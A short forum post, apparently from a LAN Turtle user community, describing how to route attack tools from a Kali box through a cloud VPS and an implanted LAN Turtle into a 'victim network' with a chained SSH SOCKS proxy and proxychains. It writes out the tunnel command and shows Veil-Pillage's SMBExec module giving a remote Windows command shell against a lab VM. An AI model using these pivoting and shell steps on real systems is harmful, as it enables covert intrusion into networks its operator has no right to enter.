SSH Socks Proxy through VPS

jxg975

Hi all!

Just wanted to share something that might help other Lan Turtlers out there.

One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle.

My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network]

I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts

I used the first line, which was this command:

ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c

Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222

By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example!

I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran

root@kali#proxychains ./Veil-Pillage

Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran!

Veil-Pillage: post-explotation framework | [Version]: 1.1.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Executing module: Smbexec Shell...
[*] Type 'exit' to exit the shell
Trying protocol 445/SMB...
Creating service SystemDiag...
|S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route!
Let me know your thoughts!
TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
  • Upvote 2